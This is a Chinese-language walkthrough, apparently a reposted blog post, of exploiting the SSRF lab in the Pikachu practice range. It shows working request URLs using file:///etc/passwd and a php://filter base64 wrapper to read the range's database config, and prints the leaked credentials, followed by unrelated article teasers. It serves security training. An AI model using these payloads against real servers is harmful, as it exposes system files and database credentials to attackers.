一.任意文件读取

        http://192.168.112.12/pikachu-master/vul/ssrf/ssrf_curl.php?url=file:///etc/passwd

读取文件使用 file://+文件路径即可,这里我们换协议为file,然后从根目录开始读取。

/etc/passwd

我们这样修改完url路径后查看结果可以看到文件内容在页面上回显了:

下面我们来读取一下靶场的敏感文件如/var/www/html/pikachu-master/inc/config.inc.php,

这个文件里面有啥我就不说了,之前我们配置靶场的时候在里面修改了一些东西:

可以看到只回显了一个1,php代码没有出现在我们的页面上,难道不能读取php代码吗?

其实不然,我们右键1点击查看,

代码在开发者模式里面显示,这里不显示在页面只是被浏览器注释掉了,这可能是浏览器的某些防

护措施吧,防止后端代码不被泄露。


<!--?php
//全局session_start
session_start();
//全局居设置时区
date_default_timezone_set('Asia/Shanghai');
//全局设置默认字符
header('Content-type:text/html;charset=utf-8');
//定义数据库连接参数
define('DBHOST', '127.0.0.1');//将localhost或者127.0.0.1修改为数据库服务器的地址
define('DBUSER', 'root');//将root修改为连接mysql的用户名
define('DBPW', '123456');//将root修改为连接mysql的密码,如果改了还是连接不上,请先手动连接下你的数据库,确保数据库服务没问题在说!
define('DBNAME', 'pikachu');//自定义,建议不修改
define('DBPORT', '3306');//将3306修改为mysql的连接端口,默认tcp3306

?-->

这样靶场的敏感配置文件就被读取出来了,但其实我们还可以别的利用协议进行读取:

http://192.168.112.12/pikachu-master/vul/ssrf/ssrf_fgc.php?file=php://filter/read=convert.base64-
encode/resource=/var/www/html/pikachu-master/inc/config.inc.php

如上这里利用filter读取协议读取根目录下的敏感配置文件进行base64位编码,然后读取到页面

上。

我们可以看到很长,我们双击复制下来:

 

PD9waHAKLy/lhajlsYBzZXNzaW9uX3N0YXJ0CnNlc3Npb25fc3RhcnQoKTsKLy/lhajlsYDlsYXorr7nva7ml7bljLoKZGF0ZV9kZWZhdWx0X3RpbWV6b25lX3NldCgnQXNpYS9TaGFuZ2hhaScpOwovL+WFqOWxgOiuvue9rum7mOiupOWtl+espgpoZWFkZXIoJ0NvbnRlbnQtdHlwZTp0ZXh0L2h0bWw7Y2hhcnNldD11dGYtOCcpOwovL+WumuS5ieaVsOaNruW6k+i/nuaOpeWPguaVsApkZWZpbmUoJ0RCSE9TVCcsICcxMjcuMC4wLjEnKTsvL+WwhmxvY2FsaG9zdOaIluiAhTEyNy4wLjAuMeS/ruaUueS4uuaVsOaNruW6k+acjeWKoeWZqOeahOWcsOWdgApkZWZpbmUoJ0RCVVNFUicsICdyb290Jyk7Ly/lsIZyb2905L+u5pS55Li66L+e5o6lbXlzcWznmoTnlKjmiLflkI0KZGVmaW5lKCdEQlBXJywgJzEyMzQ1NicpOy8v5bCGcm9vdOS/ruaUueS4uui/nuaOpW15c3Fs55qE5a+G56CB77yM5aaC5p6c5pS55LqG6L+Y5piv6L+e5o6l5LiN5LiK77yM6K+35YWI5omL5Yqo6L+e5o6l5LiL5L2g55qE5pWw5o2u5bqT77yM56Gu5L+d5pWw5o2u5bqT5pyN5Yqh5rKh6Zeu6aKY5Zyo6K+077yBCmRlZmluZSgnREJOQU1FJywgJ3Bpa2FjaHUnKTsvL+iHquWumuS5ie+8jOW7uuiuruS4jeS/ruaUuQpkZWZpbmUoJ0RCUE9SVCcsICczMzA2Jyk7Ly/lsIYzMzA25L+u5pS55Li6bXlzcWznmoTov57mjqXnq6/lj6PvvIzpu5jorqR0Y3AzMzA2Cgo/Pgo=

利用bp进行base64解码:

这里我发现乱码的,算了还是在kali里面解码吧:

然后结果就出来了。

你也可以利用在线解码:https://base64.us/网站。

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.pswp.cn/diannao/88074.shtml
繁体地址,请注明出处:http://hk.pswp.cn/diannao/88074.shtml
英文地址,请注明出处:http://en.pswp.cn/diannao/88074.shtml

如若内容造成侵权/违法违规/事实不符,请联系英文站点网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

洛谷P3953 [NOIP 2017 提高组] 逛公园

洛谷P3953 [NOIP 2017 提高组] 逛公园

洛谷P3953 [NOIP 2017 提高组] 逛公园 洛谷题目传送门 题目背景 NOIP2017 D1T3 题目描述 策策同学特别喜欢逛公园。公园可以看成一张 N N N 个点 M M M 条边构成的有向图&#xff0c;且没有 自环和重边。其中 1 1 1 号点是公园的入口&#xff0c; N N N 号点是公园的出…
阅读更多...
Vue3+TypeScript+Element Plus 表格展开行优化方案

Vue3+TypeScript+Element Plus 表格展开行优化方案

在 Vue3 TypeScript Element Plus 项目中优化表格展开行的内存使用&#xff0c;主要从 渲染优化、数据管理 和 内存回收 三方面入手。以下是最佳实践和完整解决方案&#xff1a; 1. 懒加载展开内容&#xff08;核心优化&#xff09; 只当行展开时才渲染内容&#xff0c;避免…
阅读更多...
OpenCV——直方图与匹配

OpenCV——直方图与匹配

直方图与匹配 一、直方图简介二、直方图统计三、直方图比较四、直方图均衡化五、自适应的直方图均衡化六、直方图反向投影七、模板匹配 一、直方图简介 图像直方图&#xff08;Histogram&#xff09;是一种频率分布图&#xff0c;它描述了不同强度值在图像中出现的频率。图像直…
阅读更多...
通义大模型在文档自动化处理中的高效部署指南(OCR集成与批量处理优化)

通义大模型在文档自动化处理中的高效部署指南(OCR集成与批量处理优化)

1. 传统OCR解决方案常面临识别精度低、版面分析能力弱、处理效率瓶颈等问题。通义大模型凭借其多模态理解和生成能力&#xff0c;为文档处理领域带来革命性突破。本文将深入探讨如何高效部署通义大模型实现端到端的文档自动化处理&#xff0c;特别聚焦OCR集成与批量处理优化两…
阅读更多...
Ubuntu20.04通过ssh协议配置远程终端

Ubuntu20.04通过ssh协议配置远程终端

一、在目标计算机&#xff08;即被连接的计算机&#xff09;上操作&#xff1a; 1、安装 OpenSSH 服务器&#xff1a; sudo apt update sudo apt install openssh-server3、启动并设置 SSH 服务开机自启&#xff1a; sudo systemctl enable --now ssh二、在源计算机&#xf…
阅读更多...
《HTTP权威指南》 第7章 缓存

《HTTP权威指南》 第7章 缓存

带着问题学习&#xff1a; 缓存如何提高性能如何衡量缓存的有效性缓存置于何处作用最大HTTP如何保持缓存副本的新鲜度缓存如何与其他缓存及服务器通信 web缓存是可以自动保存常见文档副本的HTTP设备。 缓存优点 减少冗余的数据传输&#xff0c;节省网络费用缓解网络瓶颈问题&…
阅读更多...
第十三章 模板

第十三章 模板

函数模板 函数模板使用 函数模板注意事项 自动类型推导&#xff0c;必须推导出一致的数据类型T,才可以使用 模板必须要确定出T的数据类型&#xff0c;才可以使用 普通函数和函数模板的类型转化 普通函数隐式类型转化&#xff08;char转int&#xff09; 函数模板正常使用不会发生…
阅读更多...
云计算-专有网络VPC

云计算-专有网络VPC

&#x1f310; 什么是 VPC&#xff1f;&#xff08;Virtual Private Cloud&#xff09; VPC&#xff08;Virtual Private Cloud&#xff0c;虚拟私有云&#xff09; 是公有云服务商提供的一种网络隔离服务&#xff0c;允许用户在云中创建一个逻辑隔离的私有网络环境。你可以在这…
阅读更多...
关于*gin.Context的理解

关于*gin.Context的理解

关于*gin.Context的理解 作为初学者&#xff0c;在学习go语言用gin开发web时&#xff0c;我对*gin.Context感到困惑。本文章以自我总结为主&#xff0c;大部分为来自询问ai后的总结&#xff0c;如有问题欢迎指出。 *gin.Context可以理解为一个gin框架的上下文对象指针&#x…
阅读更多...
Qt中的OpenGL (6)[坐标系统]

Qt中的OpenGL (6)[坐标系统]

文章目录 文章说明学习目标目录结构坐标系统局部空间世界空间观察空间裁剪空间正射投影矩阵透视投影矩阵组合进入3D世界顶点数据着色器设置数据矩阵设置文章说明 本文是学习OpenGL的笔记,主要参考大神JoeyDeVries的LearnOpenGL第八课《坐标系统》,并将教程中的代码基于Qt进行…
阅读更多...
Spring Aop @After (后置通知)的使用场景?

Spring Aop @After (后置通知)的使用场景?

核心定义 After 是 Spring AOP 中的另一种通知&#xff08;Advice&#xff09;类型&#xff0c;通常被称为“后置通知”或“最终通知”。 它的核心作用是&#xff1a; 无论目标方法是正常执行完成&#xff0c;还是在执行过程中抛出了异常&#xff0c;After 通知中的代码 总是…
阅读更多...
UNet改进(4):交叉注意力(Cross Attention)-多模态/多特征交互

UNet改进(4):交叉注意力(Cross Attention)-多模态/多特征交互

在计算机视觉领域&#xff0c;UNet因其优异的性能在图像分割任务中广受欢迎。本文将介绍一种改进的UNet架构——UNetWithCrossAttention&#xff0c;它通过引入交叉注意力机制来增强模型的特征融合能力。 1. 交叉注意力机制 交叉注意力(Cross Attention)是一种让模型能够动态地…
阅读更多...
C#里从CSV文件加载BLOB数据字段到数据库的处理

C#里从CSV文件加载BLOB数据字段到数据库的处理

大量的数据保存在CSV文件, 当需要把这些数据加载到数据库,然后使用数据库来共享出去。 就需要把CSV文件导入数据库, 怎么样快速地把CSV文件导入数据库呢? 这个就需要使用类MySqlBulkLoader,它是mariadb数据库快速导入的方式。 一般使用SQL语句导入是10秒,那么使用这种方…
阅读更多...
【后端】负载均衡

【后端】负载均衡

长期不定期更新补充。 定义 负载均衡&#xff08;Load Balancing&#xff09;是指将来自客户端的请求合理分发到多个服务器或服务节点&#xff0c;以提高系统性能、可用性与可靠性。 分工 前端不做负载均衡&#xff0c;前端只发请求&#xff0c;不知道请求去哪台服务器。 负…
阅读更多...
记录一次:Java Web 项目 CSS 样式/图片丢失问题:一次深度排查与根源分析

记录一次:Java Web 项目 CSS 样式/图片丢失问题:一次深度排查与根源分析

记录一次&#xff1a;Java Web 项目 CSS 样式/图片丢失问题&#xff1a;一次深度排查与根源分析 **记录一次&#xff1a;Java Web 项目 CSS 样式丢失问题&#xff1a;一次深度排查与根源分析****第一层分析&#xff1a;资源路径问题****第二层分析&#xff1a;服务端跳转逻辑**…
阅读更多...
torchmd-net开源程序是训练神经网络潜力

torchmd-net开源程序是训练神经网络潜力

​一、软件介绍 文末提供程序和源码下载 TorchMD-NET 提供最先进的神经网络电位 &#xff08;NNP&#xff09; 和训练它们的机制。如果有多个 NNP&#xff0c;它可提供高效、快速的实现&#xff0c;并且它集成在 GPU 加速的分子动力学代码中&#xff0c;如 ACEMD、OpenMM 和 …
阅读更多...
在Docker上安装Mongo及Redis-NOSQL数据库

在Docker上安装Mongo及Redis-NOSQL数据库

应用环境 Ubuntu 20.04.6 LTS (GNU/Linux 5.15.0-139-generic x86_64) Docker version 28.1.1, build 4eba377 文章目录 一、部署Mongo1. 拉取容器镜像2. 生成Run脚本2.1 准备条件2.2 参数解读2.3 实例脚本 3. 实例操作3.1 Mongo bash控制台3.2 库表操作 4. MongoDB Compass (G…
阅读更多...
Java 编程之责任链模式

Java 编程之责任链模式

一、什么是责任链模式&#xff1f; 责任链模式&#xff08;Chain of Responsibility Pattern&#xff09; 是一种行为型设计模式&#xff0c;它让多个对象都有机会处理请求&#xff0c;从而避免请求的发送者和接收者之间的耦合关系。将这些对象连成一条链&#xff0c;沿着这条…
阅读更多...
1、做中学 | 一年级上期 Golang简介和安装环境

1、做中学 | 一年级上期 Golang简介和安装环境

一、什么是golang Golang&#xff0c;通常简称 Go&#xff0c;是由 Google 公司的 Robert Griesemer、Rob Pike 和 Ken Thompson 于 2007 年创建的一种开源编程语言&#xff0c;并在 2009 年正式对外公布。 已经有了很多编程语言&#xff0c;为什么还要创建一种新的编程语言&…
阅读更多...
Linux--迷宫探秘:从路径解析到存储哲学

Linux--迷宫探秘:从路径解析到存储哲学

上一篇博客我们说完了文件系统在硬件层面的意义&#xff0c;今天我们来说说文件系统在软件层是怎么管理的。 Linux--深入EXT2文件系统&#xff1a;数据是如何被组织、存储与访问的&#xff1f;-CSDN博客 &#x1f30c; 引言&#xff1a;文件系统的宇宙观 "在Linux的宇宙中…
阅读更多...
最新文章

Copyright @ 2022~2023